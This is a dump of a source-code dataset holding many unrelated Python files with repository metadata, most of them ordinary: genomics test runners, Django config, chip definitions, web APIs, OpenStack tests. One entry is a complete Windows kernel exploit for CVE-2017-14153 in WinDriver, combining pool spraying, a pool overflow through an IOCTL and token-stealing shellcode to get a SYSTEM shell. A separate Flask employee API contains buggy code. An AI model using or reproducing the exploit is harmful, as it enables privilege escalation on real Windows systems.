code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Integration testing runner for Variant Transforms' Preprocessor pipeline.
To define a new preprocessor_tests integration test case, create a json file in
gcp_variant_transforms/testing/integration/preprocessor_tests directory and
specify at least test_name, blob_name and expected_contents
for the integration test.
Execute the following command from the root source directory:
python gcp_variant_transforms/testing/integration/run_preprocessor_tests.py \
--project gcp-variant-transforms-test \
--region us-central1 \
--staging_location gs://integration_test_runs/staging \
--temp_location gs://integration_test_runs/temp \
--logging_location gs://integration_test_runs/temp/integration_test_logs
To keep the reports that this test creates, use the --keep_reports option.
It runs all integration tests inside
`gcp_variant_transforms/testing/integration/preprocessor_tests`.
"""
import argparse
import os
import sys
from datetime import datetime
from typing import Dict, List # pylint: disable=unused-import
from apache_beam.io import filesystems
from google.cloud import storage
from gcp_variant_transforms.testing.integration import run_tests_common
_BUCKET_NAME = 'integration_test_runs'
_TOOL_NAME = 'vcf_to_bq_preprocess'
_TEST_FOLDER = 'gcp_variant_transforms/testing/integration/preprocessor_tests'
class PreprocessorTestCase(run_tests_common.TestCaseInterface):
"""Test case that holds information to run in Pipelines API."""
def __init__(self,
parser_args, # type: Namespace
test_name, # type: str
expected_contents, # type: List[str]
report_blob_name, # type: str
header_blob_name=None, # type: str
**kwargs # type: **str
):
# type: (...) -> None
self._keep_reports = parser_args.keep_reports
self._name = test_name
self._expected_contents = expected_contents
suffix = '_integration_tests_{}'.format(
datetime.now().strftime('%Y%m%d_%H%M%S'))
self._report_blob_name = self._append_suffix(report_blob_name, suffix)
self._report_path = '/'.join(['gs:/', _BUCKET_NAME, self._report_blob_name])
self._project = parser_args.project
args = ['--report_path {}'.format(self._report_path),
'--staging_location {}'.format(parser_args.staging_location),
'--temp_location {}'.format(parser_args.temp_location),
'--job_name {}'.format(
''.join([test_name, suffix]).replace('_', '-'))]
self._header_blob_name = None
self._header_path = None
if header_blob_name:
self._header_blob_name = self._append_suffix(header_blob_name, suffix)
self._header_path = '/'.join(['gs:/',
_BUCKET_NAME,
self._header_blob_name])
args.append('--resolved_headers_path {}'.format(self._header_path))
for k, v in kwargs.items():
args.append('--{} {}'.format(k, v))
self.run_test_command = run_tests_common.form_command(
parser_args.project,
parser_args.region,
filesystems.FileSystems.join(parser_args.logging_location,
self._report_blob_name),
parser_args.image, parser_args.sdk_container_image, _TOOL_NAME, args)
def validate_result(self):
"""Validates the results.
- Checks that the report is generated.
- Validates report's contents are the same as `expected_contents`.
- Checks that the resolved headers are generated if `header_blob_name` is
specified in the test.
"""
client = storage.Client(self._project)
bucket = client.get_bucket(_BUCKET_NAME)
report_blob = bucket.get_blob(self._report_blob_name)
if not report_blob:
raise run_tests_common.TestCaseFailure(
'Report is not generated in {} in test {}'.format(self._report_path,
self._name))
contents = report_blob.download_as_string().decode('utf-8')
expected_contents = '\n'.join(self._expected_contents)
if expected_contents != contents:
raise run_tests_common.TestCaseFailure(
'Contents mismatch: expected {}, got {} in test {}'.format(
expected_contents, contents, self._name))
if not self._keep_reports:
report_blob.delete()
if self._header_blob_name:
resolved_headers_blob = bucket.get_blob(self._header_blob_name)
if not resolved_headers_blob:
raise run_tests_common.TestCaseFailure(
'The resolved header is not generated in {} in test {}'.format(
self._header_path, self._name))
if not self._keep_reports:
resolved_headers_blob.delete()
def get_name(self):
return self._name
def _append_suffix(self, file_path, suffix):
# type: (str, str) -> str
file_name, file_extension = os.path.splitext(file_path)
return ''.join([file_name, suffix, file_extension])
def _get_args():
parser = argparse.ArgumentParser()
run_tests_common.add_args(parser)
parser.add_argument('--keep_reports',
type=bool, default=False, nargs='?', const=True,
help=('If set, generated reports and resolved headers '
'are not deleted.'))
return parser.parse_args()
def _get_test_configs():
# type: () -> List[List[Dict]]
"""Gets all test configs in preprocessor_tests."""
required_keys = ['test_name', 'report_blob_name', 'expected_contents']
test_file_path = os.path.join(os.getcwd(), _TEST_FOLDER)
return run_tests_common.get_configs(test_file_path, required_keys)
def main():
"""Runs the integration tests for preprocessor."""
args = _get_args()
test_configs = _get_test_configs()
tests = []
for test_case_configs in test_configs:
test_cases = []
for config in test_case_configs:
test_cases.append(PreprocessorTestCase(args, **config))
tests.append(test_cases)
test_runner = run_tests_common.TestRunner(tests)
test_runner.run()
return test_runner.print_results()
if __name__ == '__main__':
print('Starting preprocessor tests...')
ret_code = main()
print('Finished all preprocessor tests successfully.')
sys.exit(ret_code)
|
googlegenomics/gcp-variant-transforms
|
gcp_variant_transforms/testing/integration/run_preprocessor_tests.py
|
Python
|
apache-2.0
| 6,857
|
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'djfreeradmin.views.home', name='home'),
# url(r'^djfreeradmin/', include('djfreeradmin.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^', include(admin.site.urls)),
)
|
alb-i986/django-freeradmin
|
djfreeradmin/urls.py
|
Python
|
mit
| 510
|
"""
WSGI config for offenewahlen_nrw17 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "offenewahlen_api.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
# Fix django closing connection to MemCachier after every request (#11331)
from django.core.cache.backends.memcached import BaseMemcachedCache
BaseMemcachedCache.close = lambda self, **kwargs: None
|
OKFNat/offenewahlen-nrw17
|
src/offenewahlen_api/wsgi.py
|
Python
|
mit
| 701
|
"""
# TOP2049 Open Source programming suite
#
# Microchip PIC18F2320 DIP18
#
# Copyright (c) 2013 Pavel Stemberk <stemberk@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
from .microchip8_18f2221family import *
class Chip_PIC18F2321dip28(microchip8_18f2221family):
hasEEPROM = True
writeBufferSize = 8
eraseBufferSize = 64
def __init__(self):
microchip8_18f2221family.__init__(self,
chipPackage="DIP28",
chipPinVCC=20,
chipPinsVPP=1,
chipPinGND=19,
signature=b"\x22\x21",
flashPageSize=0x2000,
flashPages=1,
eepromPageSize=0x100,
eepromPages=1,
fuseBytes=14
)
fuseDesc = (
BitDescription(0o00, "NA"),
BitDescription(0o01, "NA"),
BitDescription(0o02, "NA"),
BitDescription(0o03, "NA"),
BitDescription(0o04, "NA"),
BitDescription(0o05, "NA"),
BitDescription(0o06, "NA"),
BitDescription(0o07, "NA"),
BitDescription(0o10, "FOSC[0], 0000=LP, 1000=internal RC oscillator, RA6=CLKO"),
BitDescription(0o11, "FOSC[1]"),
BitDescription(0o12, "FOSC[2]"),
BitDescription(0o13, "FOSC[3]"),
BitDescription(0o14, "NA"),
BitDescription(0o15, "NA"),
BitDescription(0o16, "FCMEN, 0=Fail-Safe Clock Monitor is disabled"),
BitDescription(0o17, "IESO, 0=Internal/External Switchover mode is disabled"),
BitDescription(0o20, "nPWRTEN"),
BitDescription(0o21, "BOREN[0]"),
BitDescription(0o22, "BOREN[1]"),
BitDescription(0o23, "BORV[0]"),
BitDescription(0o24, "BORV[1]"),
BitDescription(0o25, "NA"),
BitDescription(0o26, "NA"),
BitDescription(0o27, "NA"),
BitDescription(0o30, "WDTEN, 0=WDT disabled, 1=WDT enabled"),
BitDescription(0o31, "WDTPS[0]"),
BitDescription(0o32, "WDTPS[1]"),
BitDescription(0o33, "WDTPS[2]"),
BitDescription(0o34, "WDTPS[3]"),
BitDescription(0o35, "NA"),
BitDescription(0o36, "NA"),
BitDescription(0o37, "NA"),
BitDescription(0o40, "NA"),
BitDescription(0o41, "NA"),
BitDescription(0o42, "NA"),
BitDescription(0o43, "NA"),
BitDescription(0o44, "NA"),
BitDescription(0o45, "NA"),
BitDescription(0o46, "NA"),
BitDescription(0o47, "NA"),
BitDescription(0o50, "NA"),
BitDescription(0o51, "PBADEN"),
BitDescription(0o52, "LPT1OSC"),
BitDescription(0o53, "NA"),
BitDescription(0o54, "NA"),
BitDescription(0o55, "NA"),
BitDescription(0o56, "NA"),
BitDescription(0o57, "MCLRE"),
BitDescription(0o60, "STVREN"),
BitDescription(0o61, "NA"),
BitDescription(0o62, "LVP"),
BitDescription(0o63, "NA"),
BitDescription(0o64, "BBSIZ[0]"),
BitDescription(0o65, "BBSIZ[1]"),
BitDescription(0o66, "XINST"),
BitDescription(0o67, "nDEBUG"),
BitDescription(0o70, "NA"),
BitDescription(0o71, "NA"),
BitDescription(0o72, "NA"),
BitDescription(0o73, "NA"),
BitDescription(0o74, "NA"),
BitDescription(0o75, "NA"),
BitDescription(0o76, "NA"),
BitDescription(0o77, "NA"),
BitDescription(0o100, "CP[0]"),
BitDescription(0o101, "CP[1]"),
BitDescription(0o102, "CP[2]/NA"),
BitDescription(0o103, "CP[3]/NA"),
BitDescription(0o104, "CP[4]/NA"),
BitDescription(0o105, "CP[5]/NA"),
BitDescription(0o106, "NA"),
BitDescription(0o107, "NA"),
BitDescription(0o110, "NA"),
BitDescription(0o111, "NA"),
BitDescription(0o112, "NA"),
BitDescription(0o113, "NA"),
BitDescription(0o114, "NA"),
BitDescription(0o115, "NA"),
BitDescription(0o116, "CPB"),
BitDescription(0o117, "CPD"),
BitDescription(0o120, "WRT[0]"),
BitDescription(0o121, "WRT[1]"),
BitDescription(0o122, "WRT[2]/NA"),
BitDescription(0o123, "WRT[3]/NA"),
BitDescription(0o124, "WRT[4]/NA"),
BitDescription(0o125, "WRT[5]/NA"),
BitDescription(0o126, "NA"),
BitDescription(0o127, "NA"),
BitDescription(0o130, "NA"),
BitDescription(0o131, "NA"),
BitDescription(0o132, "NA"),
BitDescription(0o133, "NA"),
BitDescription(0o134, "NA"),
BitDescription(0o135, "WRTC"),
BitDescription(0o136, "WRTB"),
BitDescription(0o137, "WRTD"),
BitDescription(0o140, "EBTR[0]"),
BitDescription(0o141, "EBTR[1]"),
BitDescription(0o142, "EBTR[2]/NA"),
BitDescription(0o143, "EBTR[3]/NA"),
BitDescription(0o144, "EBTR[4]/NA"),
BitDescription(0o145, "EBTR[5]/NA"),
BitDescription(0o146, "NA"),
BitDescription(0o147, "NA"),
BitDescription(0o150, "NA"),
BitDescription(0o151, "NA"),
BitDescription(0o152, "NA"),
BitDescription(0o153, "NA"),
BitDescription(0o154, "NA"),
BitDescription(0o155, "NA"),
BitDescription(0o156, "EBTRB"),
BitDescription(0o157, "NA"),
)
ChipDescription(
Chip_PIC18F2321dip28,
bitfile="microchip01dip28",
chipID="PIC18F2321dip28",
runtimeID=(0xDE07, 0x01),
chipVendors="Microchip",
description="PIC18F2321",
packages=(("DIP28", ""),),
fuseDesc=fuseDesc,
maintainer="Pavel Stemberk <stemberk@gmail.com>",
)
|
mbuesch/toprammer
|
libtoprammer/chips/microchip8/pic18f2321dip28.py
|
Python
|
gpl-2.0
| 5,349
|
from weppy import AppModule
from weppy.tools import ServiceHandler
from starter_weppy import app
api = AppModule(app, 'api', __name__, url_prefix='api')
api.common_handlers = [ServiceHandler('json')]
@api.route()
def version():
json = {
'version': 'v1'
}
return dict(status='OK', data=json)
|
mijdavis2/starter_weppy
|
starter_weppy/controllers/api/api.py
|
Python
|
mit
| 314
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from fuelclient.commands import base
from fuelclient.commands import environment as env_commands
class EnvMoveNode(env_commands.EnvMixIn, base.BaseCommand):
"""Update node assignment."""
def get_parser(self, prog_name):
parser = super(EnvMoveNode, self).get_parser(prog_name)
parser.add_argument('node_id',
type=int,
help='ID of the node to upgrade.')
parser.add_argument('env_id',
type=str,
help='ID of the environment.')
return parser
def take_action(self, parsed_args):
# TODO(akscram): While the clone procedure is not a part of
# fuelclient.objects.Environment the connection
# will be called directly.
self.client._entity_wrapper.connection.post_request(
"clusters/{0}/upgrade/assign".format(parsed_args.env_id),
{
'node_id': parsed_args.node_id,
}
)
msg = ('Node {node_id} successfully relocated to the environment'
' {env_id}.\n'.format(
node_id=parsed_args.node_id,
env_id=parsed_args.env_id,
))
self.app.stdout.write(msg)
|
Mirantis/octane
|
octane/fuelclient/move_node.py
|
Python
|
apache-2.0
| 1,844
|
from socket import *
import threading
try:
pairfamily = AF_UNIX
except NameError:
pairfamily = AF_INET
def SocketPair(family=pairfamily, type_=SOCK_STREAM, proto=IPPROTO_IP):
"""Wraps socketpair() to support Windows using local ephemeral ports"""
try:
sock1, sock2 = socketpair(family, type_, proto)
return (sock1, sock2)
except NameError:
listensock = socket(family, type_, proto)
listensock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listensock.bind( ('localhost', 0) )
iface, ephport = listensock.getsockname()
listensock.listen(1)
sock1 = socket(family, type_, proto)
connthread = threading.Thread(target=pairConnect, args=[sock1, ephport])
connthread.setDaemon(1)
connthread.start()
sock2, sock2addr = listensock.accept()
listensock.close()
return (sock1, sock2)
def pairConnect(sock, port):
sock.connect( ('localhost', port) )
|
ActiveState/code
|
recipes/Python/525487_Extending_socketsocketpair_work/recipe-525487.py
|
Python
|
mit
| 970
|
from contextlib import contextmanager
from fabric.context_managers import settings, hide
from fabric.state import env
from refabric.state import apply_role_definitions
@contextmanager
def sudo(user=None):
with settings(sudo_user=user or env.sudo_user or env.user, use_sudo=True):
yield
@contextmanager
def role(name):
with settings(roles=[name]):
yield
apply_role_definitions(None)
silent = lambda *h: settings(hide('commands', *h), warn_only=True)
hide_prefix = lambda: settings(output_prefix=False)
abort_on_error = lambda: settings(warn_only=False)
|
5monkeys/refabric
|
refabric/context_managers.py
|
Python
|
mit
| 591
|
from kex import *
from ctypes import *
from ctypes.wintypes import *
import os
if __name__ == '__main__':
print "[*] WinDriver 12.40 and 12.50 pool overflow privilige escalation"
print "[*] CVE-2017-14153"
IOCTL_VULN = 0x953824b7
DEVICE_NAME = "\\\\.\\WinDrvr1240"
dwReturn = c_ulong()
print '[*] Trying WinDrvr1240'
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
if driver_handle == INVALID_HANDLE_VALUE:
DEVICE_NAME = "\\\\.\\WinDrvr1250"
print '[*] WinDrvr1240 was not found, trying WinDrvr1250'
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
if driver_handle == INVALID_HANDLE_VALUE:
print "[-] Coudn't open driver, tried WinDrvr1240 and WinDrvr1250"
sys.exit(-1)
required_hole_size = 0x460
good_object = find_object_to_spray(required_hole_size)
#allocate input
size = required_hole_size + len(pool_overwrite(required_hole_size,good_object))
#source: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
input = "\x41" * 0x18 # offset to size
input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow)
input += "\x42" * (0x90 - len(input)) # padding to survive bsod
input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA
input += "\x43" * ((required_hole_size - 0x8) - len(input)) # fill our pool buffer
input += pool_overwrite(required_hole_size,good_object)
alloc_memory(0x41410000, input, size)
#alloc pointer to CloseProcedure
stuff = "\x42\x42\x42\x42"
alloc_memory(0x00000060, stuff, 0x4)
#allocate shellcode in memory
SHELLCODE = tokenstealing(RETVAL = "")
stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE))
alloc_memory(0x42424242, stuff, size)
#spray the heap with EventObjects
gimme_the_hole(required_hole_size)
inputbuffer = 0x41410000 #memory address of the input buffer
inputbuffer_size = size
outputbuffer_size = 0x0
outputbuffer = None
IoStatusBlock = c_ulong()
if driver_handle:
print "[+] Talking to the driver sending vulnerable IOCTL..."
dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
None,
None,
None,
byref(IoStatusBlock),
IOCTL_VULN,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
close_all_handles()
if shell32.IsUserAnAdmin():
print "[+] We got SYSTEM!!"
os.system('cmd.exe')
else:
print "[-] Something went wrong with the exploit, no SYSTEM"
|
theevilbit/kex
|
usage_examples/CVE-2017-14153_windrvr1240-50_win7x86.py
|
Python
|
mit
| 2,678
|
# encoding: utf-8
# module PyKDE4.kdeui
# from /usr/lib/python2.7/dist-packages/PyKDE4/kdeui.so
# by generator 1.135
# no doc
# imports
import PyKDE4.kdecore as __PyKDE4_kdecore
import PyQt4.QtCore as __PyQt4_QtCore
import PyQt4.QtGui as __PyQt4_QtGui
import PyQt4.QtSvg as __PyQt4_QtSvg
from KPixmapCache import KPixmapCache
class KIconCache(KPixmapCache):
# no doc
def defaultIconSize(self, *args, **kwargs): # real signature unknown
pass
def deleteCache(self, *args, **kwargs): # real signature unknown
pass
def existingIconThemeDirs(self, *args, **kwargs): # real signature unknown
pass
def find(self, *args, **kwargs): # real signature unknown
pass
def insert(self, *args, **kwargs): # real signature unknown
pass
def loadCustomData(self, *args, **kwargs): # real signature unknown
pass
def loadCustomIndexHeader(self, *args, **kwargs): # real signature unknown
pass
def mostRecentMTime(self, *args, **kwargs): # real signature unknown
pass
def setThemeInfo(self, *args, **kwargs): # real signature unknown
pass
def writeCustomData(self, *args, **kwargs): # real signature unknown
pass
def writeCustomIndexHeader(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247972723/PyKDE4/kdeui/KIconCache.py
|
Python
|
gpl-2.0
| 1,404
|
#!/usr/bin/python3
# Employee API - v1.0
from opsapi import app
from flask import jsonify
from flask import request
from flask import g
"""
I prefer the BREAD acryonm: Browse, Read, Edit, Add and Delete
So to protect the scope of the entire application functions will
be named passenger_[bread_keyword]. This will avoid naming collisions
across our entire python module.
"""
# Get a list of passengers (Browse) ==========================================
@app.route('/api/1.0/employee', methods=['GET'])
def employee_browse():
# The active flag shows only the 'non-deleted' items
# If you want to see everything pass active=0
active = request.args.get('active', default='1', type=int)
# It is a best practice to limit the amount of data an
# API will allow a user to retrieve on a single call
# This creates a throttle to protect the server.
# In this case we are just defaulting to 10 but will let
# them ask for more
limit = request.args.get('limit', default='10', type=int)
# Get the employee records
# NOTE: not querying password on purpose
g.c.execute('''SELECT rowid, name, email, active,
phone, message, status_id, date_created
FROM employee
WHERE active=?
LIMIT ?''', (active, limit))
data = g.c.fetchall()
# Send the data back as JSON
return jsonify(data)
# Get the records of an employee
@app.route('/api/1.0/employee/<employee_id>', methods=['GET'])
def employee_read(employee_id):
# Return all information about an employee
# DO NOT return the password.
g.c.execute('''SELECT rowid, name, email, active,
phone, message, status_id, date_created
FROM employee
WHERE active = 1 AND rowid = ?''',
(passenger_id))
# Grabbing the one employee
data = g.c.fetchone()
# Return in JSON format
return jsonify(data)
# Updates the records for an employee based on id
@app.route('/api/1.0/employee/<employee_id>', methods=['PUT'])
def employee_edit(employee_id):
# Get input from the user with the updated information
name = request.form.get('name')
email = request.form.get('email')
phone = request.form.get('phone')
message = request.form.get('message')
status_id = request.form.get('status_id')
# Tells user if they forget information
if not name or not email or not phone or not message or not status_id:
return jsonify({'Success': False, 'error': 'Missing Values'})
g.c.execute('''UPDATE employee SET name=?, email=?,
phone=?, message=?, status_id=?, active=1
WHERE rowid=?''',
(name, email, phone, message, status_id, employee_id))
# Update the changes made to the database
g.conn.commit()
# Let the user know the changes were successful
return jsonify({'Success': True, 'rowid':employee_id})
# Adds an employee
@app.route('/api/1.0/employee', methods=['POST'])
def employee_add():
# get user input
name = request.form.get('name')
email = request.form.get('email')
phone = request.form.get('phone')
password = request.form.get('password')
message = request.form.get('message')
status_id = request.form.get('status_id')
date_created = request.form.get('date_created')
# Tell the user if they forget a value
if not name or not email or not phone or not password or not message or not status_id or not date_created:
return jsonify({'Success': False, 'error': 'Missing Values'})
g.c.execute('''INSERT INTO employee VALUES (?,?,?,?,?,?,?,?)''',
(name, email, phone, password, message, status_id, 1,
date_created))
#we get the id of the last item inserted
rowid = g.c.lastrowid
#Save changes to the database
g.conn.commit()
#Tell the user it was added
return jsonify({'Success': True, 'rowid':rowid})
# Deletes an employee from the database
@app.route('/api/1.0/employee/<employee_id>', methods=['DELETE'])
def employee_delete(employee_id):
#set the active flag to 0 to appear deleted
g.c.execute('''UPDATE employee SET active=0 WHERE rowid=?''',employee_id)
#Push changes to database
g.conn.commit()
|
roguefalcon/rpi_docker_images
|
hackmt_2018_code/opsapi/opsapi/employee.py
|
Python
|
gpl-3.0
| 4,177
|
# Copyright © 2020 Arm Ltd and Contributors. All rights reserved.
# SPDX-License-Identifier: MIT
"""
Object detection demo that takes a video stream from a device, runs inference
on each frame producing bounding boxes and labels around detected objects,
and displays a window with the latest processed frame.
"""
import os
import sys
script_dir = os.path.dirname(__file__)
sys.path.insert(1, os.path.join(script_dir, '..', 'common'))
import cv2
from argparse import ArgumentParser
from ssd import ssd_processing, ssd_resize_factor
from yolo import yolo_processing, yolo_resize_factor
from utils import dict_labels
from cv_utils import init_video_stream_capture, preprocess, draw_bounding_boxes
from network_executor import ArmnnNetworkExecutor
def get_model_processing(model_name: str, video: cv2.VideoCapture, input_binding_info: tuple):
"""
Gets model-specific information such as model labels and decoding and processing functions.
The user can include their own network and functions by adding another statement.
Args:
model_name: Name of type of supported model.
video: Video capture object, contains information about data source.
input_binding_info: Contains shape of model input layer, used for scaling bounding boxes.
Returns:
Model labels, decoding and processing functions.
"""
if model_name == 'ssd_mobilenet_v1':
return ssd_processing, ssd_resize_factor(video)
elif model_name == 'yolo_v3_tiny':
return yolo_processing, yolo_resize_factor(video, input_binding_info)
else:
raise ValueError(f'{model_name} is not a valid model name')
def main(args):
video = init_video_stream_capture(args.video_source)
executor = ArmnnNetworkExecutor(args.model_file_path, args.preferred_backends)
model_name = args.model_name
process_output, resize_factor = get_model_processing(args.model_name, video, executor.input_binding_info)
labels = dict_labels(args.label_path, include_rgb=True)
while True:
frame_present, frame = video.read()
frame = cv2.flip(frame, 1) # Horizontally flip the frame
if not frame_present:
raise RuntimeError('Error reading frame from video stream')
if model_name == "ssd_mobilenet_v1":
input_tensors = preprocess(frame, executor.input_binding_info, True)
else:
input_tensors = preprocess(frame, executor.input_binding_info, False)
print("Running inference...")
output_result = executor.run(input_tensors)
detections = process_output(output_result)
draw_bounding_boxes(frame, detections, resize_factor, labels)
cv2.imshow('PyArmNN Object Detection Demo', frame)
if cv2.waitKey(1) == 27:
print('\nExit key activated. Closing video...')
break
video.release(), cv2.destroyAllWindows()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--video_source', type=int, default=0,
help='Device index to access video stream. Defaults to primary device camera at index 0')
parser.add_argument('--model_file_path', required=True, type=str,
help='Path to the Object Detection model to use')
parser.add_argument('--model_name', required=True, type=str,
help='The name of the model being used. Accepted options: ssd_mobilenet_v1, yolo_v3_tiny')
parser.add_argument('--label_path', required=True, type=str,
help='Path to the labelset for the provided model file')
parser.add_argument('--preferred_backends', type=str, nargs='+', default=['CpuAcc', 'CpuRef'],
help='Takes the preferred backends in preference order, separated by whitespace, '
'for example: CpuAcc GpuAcc CpuRef. Accepted options: [CpuAcc, CpuRef, GpuAcc]. '
'Defaults to [CpuAcc, CpuRef]')
args = parser.parse_args()
main(args)
|
ARM-software/armnn
|
python/pyarmnn/examples/object_detection/run_video_stream.py
|
Python
|
mit
| 4,016
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.common import config # noqa
from neutron import context as n_context
from oslo_config import cfg
from gbpservice.neutron.services.servicechain.plugins.ncp import model
from gbpservice.neutron.tests.unit.services.grouppolicy import (
test_resource_mapping as test_gp_driver)
from gbpservice.neutron.tests.unit.services.servicechain.ncp import (
test_ncp_plugin as base)
class TrafficStitchingPlumberTestCase(base.NodeCompositionPluginTestCase):
def setUp(self):
cfg.CONF.set_override('policy_drivers', ['implicit_policy',
'resource_mapping'],
group='group_policy')
cfg.CONF.set_override('allow_overlapping_ips', True)
cfg.CONF.set_override(
'extension_drivers', ['proxy_group'], group='group_policy')
super(TrafficStitchingPlumberTestCase, self).setUp(
node_drivers=['node_dummy'], node_plumber='stitching_plumber',
core_plugin=test_gp_driver.CORE_PLUGIN)
res = mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.'
'_check_router_needs_rescheduling').start()
res.return_value = None
self.driver = self.sc_plugin.driver_manager.ordered_drivers[0].obj
self.driver.get_plumbing_info = mock.Mock()
self.driver.get_plumbing_info.return_value = {}
def test_one_gateway_pt_prov_cons(self):
context = n_context.get_admin_context()
self.driver.get_plumbing_info.return_value = {
'provider': [{}], 'consumer': [{}], 'plumbing_type': 'gateway'}
provider, consumer, node = self._create_simple_chain()
provider = self.show_policy_target_group(
provider['id'])['policy_target_group']
# Verify Service PT created and correctly placed
targets = model.get_service_targets(context.session)
self.assertEqual(2, len(targets))
old_relationship = None
for target in targets:
self.assertEqual(node['id'], target.servicechain_node_id)
pt = self.show_policy_target(
target.policy_target_id)['policy_target']
if target.relationship == 'provider':
self.assertEqual(provider['id'],
pt['policy_target_group_id'])
self.assertTrue(pt['group_default_gateway'])
self.assertFalse(pt['proxy_gateway'])
else:
# Consumer side a proxy group exists
self.assertEqual(provider['proxy_group_id'],
pt['policy_target_group_id'])
self.assertFalse(pt['group_default_gateway'])
self.assertTrue(pt['proxy_gateway'])
self.assertNotEqual(old_relationship, target.relationship)
old_relationship = target.relationship
port = self._get_object('ports', pt['port_id'], self.api)['port']
self.assertTrue(port['name'].startswith('pt_service_target_'),
"Port name doesn't start with 'pt_service_target_"
"'.\nport:\n%s\n" % port)
self.update_policy_target_group(
provider['id'], provided_policy_rule_sets={})
# With chain deletion, also the Service PTs are deleted
new_targets = model.get_service_targets(context.session)
self.assertEqual(0, len(new_targets))
for target in targets:
self.show_policy_target(
target.policy_target_id, expected_res_status=404)
provider = self.show_policy_target_group(
provider['id'])['policy_target_group']
self.assertIsNone(provider['proxy_group_id'])
def test_ptg_delete(self):
self.driver.get_plumbing_info.return_value = {
'provider': [{}], 'consumer': [{}],
'plumbing_type': 'transparent'}
provider, _, _ = self._create_simple_service_chain()
# Deleting a PTG will fail because of existing PTs
self.delete_policy_target_group(provider['id'],
expected_res_status=204)
|
jiahaoliang/group-based-policy
|
gbpservice/neutron/tests/unit/services/servicechain/ncp/test_traffic_stitching_plumber.py
|
Python
|
apache-2.0
| 4,728
|
from httmock import urlmatch
free_proxy_expected = ['138.197.136.46:3128', '177.207.75.227:8080']
proxy_for_eu_expected = ['107.151.136.222:80', '37.187.253.39:8115']
rebro_weebly_expected = ['213.149.105.12:8080', '119.188.46.42:8080']
prem_expected = ['191.252.61.28:80', '167.114.203.141:8080', '152.251.141.93:8080']
sslproxy_expected = ['24.211.89.146:8080', '187.84.222.153:80', '41.193.238.249:8080']
@urlmatch(netloc=r'(.*\.)?sslproxies\.org$')
def sslproxy_mock(url, request):
return """<table class="table table-striped table-bordered" cellspacing="0" width="100%" id="proxylisttable">
<thead>
<tr>
<th>IP Address</th>
<th>Port</th>
<th>Code</th>
<th class='hm'>Country</th>
<th>Anonymity</th>
<th class='hm'>Google</th>
<th class='hx'>Https</th>
<th class='hm'>Last Checked</th>
</tr>
</thead>
<tbody>
<tr>
<td>24.211.89.146</td>
<td>8080</td>
<td>US</td>
<td class='hm'>United States</td>
<td>elite proxy</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>8 seconds ago</td>
</tr>
<tr>
<td>187.84.222.153</td>
<td>80</td>
<td>BR</td>
<td class='hm'>Brazil</td>
<td>anonymous</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>1 minute ago</td>
</tr>
<tr>
<td>41.193.238.249</td>
<td>8080</td>
<td>ZA</td>
<td class='hm'>South Africa</td>
<td>elite proxy</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>1 minute ago</td>
</tr>
</tbody>
